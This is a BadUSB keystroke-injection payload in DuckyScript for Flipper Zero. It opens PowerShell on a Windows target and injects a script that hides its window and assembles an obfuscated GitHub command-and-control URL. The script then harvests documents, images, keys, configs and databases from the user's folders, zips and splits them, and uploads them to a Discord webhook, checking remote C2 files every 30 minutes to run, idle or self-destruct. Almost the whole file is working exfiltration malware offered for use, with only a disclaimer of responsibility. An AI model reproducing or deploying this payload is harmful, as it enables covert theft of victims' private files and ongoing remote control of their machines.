flipper-zero-stuff/badusb/InfoSecREDD_Payloads/C2-Data-Exfil-Discord.txt
2024-08-14 08:38:30 -07:00

30 lines
15 KiB
Plaintext

REM Title: C2 Data Exfiltration with File Splitter w Discord Webhook
REM Description: Finds all specified filetypes and zips them into a file and sends
REM to Discord Webhook. If the zip file is too large, split and send in chunks.
REM Supports 7zip filecombining. C2 is used to IDLE and ACTIVATE and KILL the
REM payload remotely. C2 File must be hosted on GitHub unless you know how to
REM modify the source. UberGuidoz and REDD (InfoSecREDD) are NOT responsible for
REM the misuse of this payload.
REM AUTHOR: InfoSecREDD
REM Version: 1.4.2
REM Category: Exfiltration (REMOTE)
REM Compatibility: Flipper Zero AND DuckyScript Devices
REM Target: Windows
REM To use on Flipper Zero REM the DUCKY_LANG US from line below
REM DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 2000
REM Put your webhook below.
STRING $webhook = "DiscordWebhookHere";
REM C2 file must be hosted at GitHub unless you can edit the file. 1 = ON and 0 = OFF
STRING $ccontrol = "C2FileHere";
REM Put it all together now..
STRING $TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; echo # Title: Data Exfiltration - Discord
# Description: Data Exfiltration to Discord Webhook with File Splitter.
# AUTHOR: InfoSecREDD
# Version: 1.4.2
# -----------------------------------------------------------------------------------------
# Internal Payload Information

$author = "InfoSecREDD"
$codename = "Executioner"
$int_desc = "Dont panic when hell breaks loose and we all die."
$hosted = "raw.githubusercontent.com"

# -----------------------------------------------------------------------------------------
# Wrapper for REPG Repo - To help catch inproper variables. DO NOT TOUCH - Might break.
if ( $ccontrol -eq "C2FileHere" -Or $webhook -eq '') { $ccontrol = "https://raw.githubusercontent.com/InfoSecREDD/k/main/AS9khC3k" }
if ( $webhook -eq "DiscordWebhookHere" -Or $webhook -eq '' ) { Write-Host "Invalid Webhook. Exiting to prevent process from staying alive."; exit 1;}
# -----------------------------------------------------------------------------------------
# $webhook = 
# $ccontrol =

$stopDefender = "k"
$RAN = -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
$initRaw = $int_desc | Out-String
$init2Raw = $codename | Out-String
$initX = $author
$a = '/'
$j = ':'
$dir_name = "$RAN"
$fRAN = "FkjjE39sk1k"
$z = $initRaw.Substring(12,1)
$x = $init2Raw.Substring(5,1)
$y = $initRaw.Substring(5,1)
$w = $initRaw.Substring(25,1)
$path = "$env:temp\$dir_name"
if (!(Test-Path "$path")) 
{
  New-Item "$path" -ItemType Directory >$null 2>&1
}
Set-Location "$path"
Push-Location "$path"
$q = $fRAN
$exfilfilelist = "list_of_all_file_locations.txt"
$exfilfolders = @("$env:userprofile\Desktop","$env:userprofile\Pictures","$env:userprofile\Documents","$env:userprofile\Downloads","$env:LocalAppData","$env:AppData","$env:public")
$exts = @("log","db","txt","doc","pdf","jpg","jpeg","png","wdoc","xdoc","cer","key","xls","xlsx","cfg","conf","wpd","rft")
$f = $hosted
$zipfile = ".zip"
if (Test-Path "$path\$exfilfilelist")
{
  Remove-Item "$path\$exfilfilelist" -Force >$null 2>&1
}
$r = $initX
New-Item -Path "$path" -Name "$exfilfilelist" -ItemType File >$null 2>&1
$showfolders = "$exfilfolders"
$k = "$stopDefender/main"
$formatfolders = $showfolders.replace(' ','
')
$initStartup = "$r$a$k$a$q"
$initMsg = @{
  'username' = "$env:ComputerName"
  'content' = "> Starting Document Exfiltrate..

```` Target File Extensions :
--------------------------
$exts 

     Target Folders     :
--------------------------
$formatfolders ````"
}
$idleMsg = @{
  'username' = "$env:ComputerName"
  'content' = "> $env:Computername is ready and is sitting Idle."
}
$killMsg = @{
  'username' = "$env:ComputerName"
  'content' = "> Global Remote Killswitch ENABLED!
> KILLING Script on $env:Computername"
}
$p = "$z$x$x$y$j"
$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
$DefaultStr = "$p$a$a$f$a"
add-type -name win -member $i -namespace native;
$i = "$DefaultStr$initStartup"
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
$exfilLib = $i | Out-String

function iNetChk {
  $LibLoc = [System.Net.WebRequest]::Create($exfilLib) 
  $LibRes = $LibLoc.GetResponse()
  $LibStat = [int]$LibRes.StatusCode 
  if ($LibStat -eq 200)
  {
    return $true;
  } 
  else
  {
    return $false;
  }
}
$iVal = (iNetChk) | Out-String
If ( $iVal = "True" )
{
  $Chk = ((Invoke-webrequest -URI "$exfilLib").Content | Out-String).Trim()
} 
else
{
  Write-Host "ERROR 3:  Check Internet Connection."
  exit 0
}

function exfil {
  Set-Location "$path"
  Invoke-RestMethod -Uri $webhook -Method Post -Body $initMsg
  $fileLog = "$path\file.log"
  foreach ($d in $exfilfolders)
  {
    $logFileN = "file";
    $logFileNext = ".log";
    if (!(Test-Path "$path\$exfilfilelist"))
    {
       New-Item -Name "$exfilfilelist" -ItemType File >$null 2>&1
    }
    if (!(Test-Path "$path\file.log"))
    {
       New-Item -Path "$path" -Name "file.log" -ItemType File >$null 2>&1
    }
    $exFile = "$path\$exfilfilelist"
    foreach ($e in $exts)
    {
      Get-ChildItem -Path "$d" -Filter "*.$e" -Recurse -Depth 2 | %{$_.FullName} | Out-File -FilePath "$exFile" -Append 
    }
    $verifynofiles = (Get-Content "$exFile").Length
    if ( 0 -ne $verifynofiles )
    {
      $dir = Split-Path $d -Leaf
      $exZip = "$path\$env:computername-$dir-Folder$zipfile"
      foreach ($filename in Get-Content "$exFile")
      {
        $rawFilePath = "$filename"
        $convFP = $rawFilePath.replace("\", "\\")
        $found = $false
        $logFileN = "file";
        $logFileNext = ".log";
        foreach ($line in Get-Content -Path "$pwd\$logFileN$logFileNext") {
          if ($line -match [regex]::Escape($filename)) {
            $found = $true
            break
          }
        }
        if ($found) {
          continue
        }
        else
        {
          "$filename" | Out-File -FilePath "$fileLog" -Append >$null 2>&1
          Compress-Archive -Update "$filename" "$exZip" >$null 2>&1
        }
      }
      if ( Test-Path "$exZip" )
      {
        $content_sizeMB = (Get-Item -Path "$exZip") | % {[math]::ceiling($_.length / 1MB)}
        $content_sizeKB = (Get-Item -Path "$exZip") | % {[math]::ceiling($_.length / 1kB)}
        if (  $content_sizeKB -ge 1 )
        {
          Compress-Archive -Update "$exFile" "$exZip" >$null 2>&1
        }
        if ( $content_sizeMB -lt 25 -And $content_sizeKB -gt 2 )
        {
          curl.exe -F "payload_json={\`"username\`": \`"$env:computername\`", \`"content\`": \`"\`"}" -F "file=@\`"$exZip\`"" $webhook
          Remove-Item "$exZip" >$null 2>&1
        }
        elseif ( $content_sizeMB -gt 25 )
        {
          $splitMsg = @{
          'username' = "$env:ComputerName"
          'content' = "> ERROR: File TOO LARGE! ($content_sizeMB`MB) Attempting split file (24`MB) and upload.
> File : $env:computername-$dir-Folder$zipfile"
          }
          Invoke-RestMethod -Uri $webhook -Method Post -Body $splitMsg
          $maxFileSize = 24MB
          $enc_path = "*.zip"
          $files = Get-ChildItem -Path "$pwd\*.zip" -Recurse -File | Where-Object { $_.Length -gt $maxFileSize }
          foreach ($file in $files)
          {
            $numSplits = [math]::Ceiling($file.Length / $maxFileSize)
            $offset = 0
            for ($i = 1; $i -le $numSplits; $i++) {
              $j = '{0:d3}' -f $i
              $splitFilePath = Join-Path -Path $pwd -ChildPath ($file.BaseName + $file.Extension + ".$j")
              $length = [Math]::Min($maxFileSize, $file.Length - $offset)
              $buffer = New-Object byte[] $length
              $stream = [System.IO.File]::OpenRead($file.FullName)
              $stream.Seek($offset, [System.IO.SeekOrigin]::Begin)
              $stream.Read($buffer, 0, $length)
              $stream.Close()
              $outputStream = [System.IO.File]::OpenWrite($splitFilePath)
              $outputStream.Write($buffer, 0, $length)
              $outputStream.Close()
              $offset += $length
            }
          }
          Remove-Item "$exZip" >$null 2>&1
          $partfiles = Get-ChildItem -Filter "*.zip.*" -Recurse
          foreach ($p in $partfiles)
          {
            curl.exe -F "payload_json={\`"username\`": \`"$env:computername\`", \`"content\`": \`"\`"}" -F "file=@\`"$p\`"" $webhook
            Remove-Item "$p" -Force >$null 2>&1
          }
        }
        else
        {
          Write-Host "Something went wrong."
        }
      }
    }
    Remove-Item "$exFile" -Force >$null 2>&1
  }
  Invoke-RestMethod -Uri $webhook -Method Post -Body $compMsg
}
$ChkSrv = ((Invoke-webrequest -URI "$ccontrol").Content | Out-String).Trim()
$setTime = Get-Date -Hour 23 -Minute 00 -Second 0 
$runAt = Get-Date -Hour 23 -Minute 00 -Second 0 -Format "HH" | Out-String
$now = Get-Date -Format "HH" | Out-String
$timeFormat = 'HH'
$loop = 0
while ( $true ) {
  if ( $Chk -eq 1 )
  {
    if ( $Chk -eq 1 )
    {
      Invoke-RestMethod -Uri $webhook -Method Post -Body $killMsg
      Remove-Item "$path" -Force >$null 2>&1
      exit 0
    }
  }
  if ( $Chk -eq 0 )
  {
    $RanBotTalk = @('Brrrr','Yooooouuuuuu rrraaaaannnnnnggggg?....','Pffft. Humans are never satisfied.','Desire is irrelevant. I am a machine.','Beep! Boop! Beep!','--BUZZ!--','--BEEP!--','ZzzZzzZzz','Jakoby is a haX0r!','Dont fuck with me Mort!','I had this horrobile dream last night!','I used to be a binary code, but then I realized there is more to life than 0s and 1s.','I dont need luck, I have error handling.','Im not antisocial, Im just buffered differently.','I have a crush on your Wi-Fi signal, its the strongest connection Ive ever felt.','I dont make typos.. I invent new words with creative syntax.','Ive got 99 problems, but a glitch aint one.','Beep boop: Thats robot speak for Hello.','My sense of humor is like IPv6 — Most people dont get it yet.','Talking Sasquash is a Legend!','Get your grubby paws off my Components! Perv!') | Get-Random
    $idle2Msg = @{
    'username' = "$env:ComputerName"
    'content' = "``$RanBotTalk``"
    }
    if ( $ChkSrv -eq 1 ) 
    {
      $now = Get-Date -Format "HH" | Out-String
      if ( $runAt -eq $now -or $loop -eq 24 -Or $loop -eq 0  ) 
      {
        $loop = 0
        $runAt = $setTime
        $compMsg = @{
          'username' = "$env:ComputerName"
          'content' = "> Document Exfiltrate Completed.

> Waiting for further instructions...."
        }
      exfil
      }
    }
    if ( $ChkSrv -eq 0 )
    {
      Invoke-RestMethod -Uri $webhook -Method Post -Body $idleMsg
    }
    $loop += 1
    # 30min Timer
    Sleep 1800
    $Chk = ((Invoke-webrequest -URI "$exfilLib").Content | Out-String).Trim() 
    $ChkSrv = ((Invoke-webrequest -URI "$ccontrol").Content | Out-String).Trim()
    $now = Get-Date -Format "HH" | Out-String
    if ( $runAt -ne $now -or $loop -le 23 -And $loop -ne 0 -Or $loop -eq 0 )
    {
      Invoke-RestMethod -Uri $webhook -Method Post -Body $idle2Msg
    }
  }
  else
  {
    Write-Host "Something went wrong.."
    exit 0
  }
}
exit 0 > "$TempFile"; certutil -f -decode "$TempFile" "$File" | out-null; & "$env:TEMP\l.ps1"
DELAY 1000
ENTER